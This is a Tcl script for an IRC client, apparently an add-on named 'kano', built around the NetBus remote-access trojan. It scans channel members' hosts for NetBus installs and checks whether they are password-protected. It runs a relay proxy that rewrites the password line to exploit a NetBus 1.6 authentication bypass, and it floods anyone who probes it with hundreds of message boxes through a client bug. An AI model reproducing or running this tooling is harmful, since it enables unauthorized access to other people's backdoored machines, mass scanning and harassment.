set nb_ips "" if [catch {socket -server init_nb 12345} nb_sock] { addecho "[kano] Could not get port 12345 for netbus capture: $nb_sock. You may have netbus." } { addecho "[kano] Captured netbus port (TCP/12345); try /netbus" } set last_nb 0.0.0.0 proc init_nb {x y z} { global last_nb if {$last_nb != $y} { set host [fconfigure $x -peername] if {[lindex $host 0] == [lindex $host 1]} { set ip "couldn't resolve" set dns [lindex $host 0] } { set ip [lindex $host 0] set dns [lindex $host 1] } lappend echo "[kano] $dns ($ip) tried netbus scanning you." global who set dns [string tolower $dns] foreach i [array names who] { set j [string tolower [lindex [split $who($i) @] end]] if {$j == $dns || $j == $ip} { set ch "" foreach k [channels] { if [ison $i $k] { lappend ch $k } } lappend echo "[kano] This host matches $i ($who($i)) on [llength $ch] channel(s) with you: [join $ch ", "]" } } set floodnum 200 set puts "Netbus 1.70\nAccess;1" lappend echo "[kano] Flooding $y's netbus client with $floodnum Info messageboxes from [get_cookie nb_text "(no filename (type /netbus text); using default)"]" if [catch {open [get_cookie nb_text]} m] { set text "You're lame and you know it." } { set text [join [split [string trim [read $m] \n] \n] |] close $m } for {set i 0} {$i < $floodnum} {incr i} { append puts "\nInfo;$text" } catch {puts $x $puts} close $x global isaway set echo [join $echo \n] echo $echo if {$isaway && [window type] != "status"} { echo $echo status } } } proc nb_proxy {sock host x} { global nb_proxy nb_psocks if {[lsearch -glob [get_cookie nb_ban] "$host *"] == -1} { echo "[kano] $host tried connecting to you on your netbus proxy port." echo "[kano] Type '/netbus kill $sock' to disconnect this user, or" echo "[kano] /netbus ban $host to ban the host permanently." } { echo "[kano] Banned host $host tried connecting to netbus proxy port." echo "[kano] Closing connection..." close $sock return } if [catch {socket -async [lindex $nb_proxy 0] [lindex $nb_proxy 1]} x] { echo "[kano] Couldn't create socket to [join $nb_proxy :] for incoming" echo "[kano] connection $host: $x" close $sock return } { set sock2 $x } fconfigure $sock -buffering line -blocking 0 fconfigure $sock2 -buffering line -blocking 0 fileevent $sock readable [list nb_psend $sock $sock2] fileevent $sock2 readable [list nb_pget $sock2 $sock] lappend nb_psocks $sock $sock2 } proc nb_pget {in out} { if {[eof $in] || [eof $out] || [catch {gets $in i}]} {close $out;close $in;return} puts $out $i echo "pget $in->$out : $i" } proc nb_psend {in out} { if {[eof $in] || [eof $out] || [catch {gets $in i}]} {close $out;close $in;return} set j [string tolower [split $i \;]] if {[lindex $j 0] == "password"} { set i "Password;1;[lindex $j 2]" } puts $out $i echo "psend $in->$out : $i" } menu users "Net&Bus Scan" {/netbus [join [args] ,];complete} alias netbus { switch -- [lindex [args] 0] { text { set file [join [lrange [args] 1 end]] if ![file exists $file] { echo "[kano] Usage: /[event] text " if ![file exists [get_cookie nb_text]] { echo "[kano] This text is displayed in an infinite number of messageboxes" echo "[kano] on the screen of the person who's trying to netbus scan you." echo "[kano] Funny how the netbus client has an exploit in it eh?" } { set m [open [get_cookie nb_text]] echo "[kano] File ([get_cookie nb_text]) contents:" echo [read $m] close $m } } { set_cookie nb_text $file echo "[kano] Set text file to $file" } complete } kill { if [catch {close [lindex [args] 1]} x] { echo "[kano] Couldn't kill connection: $x" } { echo "[kano] Closed connection." } } ban { if {[lindex [args] 1] == ""} { echo "[kano] [llength [get_cookie nb_ban]] ban(s)" foreach i [get_cookie nb_ban] { echo " [lindex $i 0] ([since c[lindex $i 1]] ago)" } } { set x [get_cookie nb_ban] set h [lindex [args] 1] set y [lsearch -glob $x "$h *"] if {$y == -1} {lappend x [list $h [clock seconds]]} { set x [lreplace $x $y $y] } set_cookie nb_ban $x /[event] ban } complete } proxy { complete set host [lindex [args] 1] set port [lindex [args] 2] if {$port == ""} {set port 12345} if {[lindex [args] 1] == ""} {/[event];return} if {[catch {eof $nb_server} x] || $x} { catch {close $nb_server} if [catch {socket -server nb_proxy 13579} x] { echo "[kano] Couldn't grab the netbus proxy socket 13579: $x" return } { set nb_server $x echo "[kano] Got netbus proxy socket 13579." } } set nb_proxy [list $host $port] echo "[kano] Point netbus to 127.0.0.1 port 13579." } "" { echo "[kano] Usage: /[event] \[port\]" echo "[kano] Example: /[event] kano,morganti,109.2.135.18" echo "[kano] Example: /[event] #kano" echo "[kano] OR: /[event] proxy \[port\]" echo "[kano] Example: /[event] proxy 18.253.126.149" echo "[kano] Netbus 1.6 and below has a bug in which it allows" echo " access to anyone even if it's supposedly pass-protected." echo " Type /netbus proxy then connect to 127.0.0.1" echo " port 4,0113579. It will relay to the host you specify" echo " in /netbus proxy, but will allow you access if it's under" echo " version 1.60." complete return } default { set ip [lindex [args] 0] set port [lindex [args] 1] if {$port == ""} {set port 12345} if ![window exists query .netbus.] { /query .netbus. window set_title "NetBus scan window" query .netbus. } if [ison [my_nick] $ip] { set ip [join [chanlist $ip] ,] } elseif [string match *\[\\*\\?\]* $ip] { set x [array names who] set l "" foreach i $x { if [string match $ip $i] {lappend l $i} } set ip [join $l ,] } foreach ip [split $ip ,] { set nick $ip if {[uhost $ip] != ""} {set ip [lindex [split [uhost $ip] @] end]} if [catch {socket -async $ip 12345} x] { echo "4(x) could not connect to $ip:$port: $x." query .netbus. } { lappend nb_ips $x fconfigure $x -blocking 0 -buffering line set nb_stage($x) 0 fileevent $x readable [list read_nb $x $ip $nick] fileevent $x writable "[list fileevent $x writable ""];[list echo "9(o) connected to $ip:$port." query .netbus.]" after 10000 [list timeout_nb $x $ip $nick] } update;FALC_yield } } } complete } proc timeout_nb {sock ip nick} { if {$ip == $sock} {set n $ip} {set n "$nick ($ip)"} if ![catch {close $sock}] { echo "5(x) connection to $n timed out." query .netbus. } } proc read_nb {sock ip nick} { if {$ip == $sock} {set n $ip} {set n "$nick ($ip)"} if ![window exists query .netbus.] { /query .netbus. window set_title "NetBus scan window" query .netbus. } if [eof $sock] { close $sock echo "4(x) connection closed to $n" query .netbus. return } global nb_stage gets $sock i if {$i == ""} return switch -- $nb_stage($sock) { 0 { set i [split $i] if {[string tolower [lindex $i 0]] == "netbus"} { echo "10(+) $n uses NetBus v([join [lrange $i 1 end]]); checking for password" query .netbus. puts $sock "Password;1;yousuck" } { echo "13(?) $n most likely doesn't have NetBus, so closing connection; got: [join $i]" query .netbus. close $sock } } 1 { set split [split [join $i] \;] set found 0 if {[lindex $split 0] == "Access"} { if {[lindex $split 1] == 0} { echo "7(-) $n is password-protected; closing connection" query .netbus. close $sock set found 1 } elseif {[lindex $split 1] == 1} { echo "11(!) $n is not password-protected; closing connection anyways" query .netbus. close $sock set found 1 } } if !$found { echo "6(?) $n gave unknown response; closing connection: [join $i]" query .netbus. } } } incr nb_stage($sock) } set nb_psocks "" on unload { catch {close $nb_sock} catch {close $nb_server} foreach i $nb_psocks {catch {close $i}} foreach i $nb_ips {catch {close $i}} }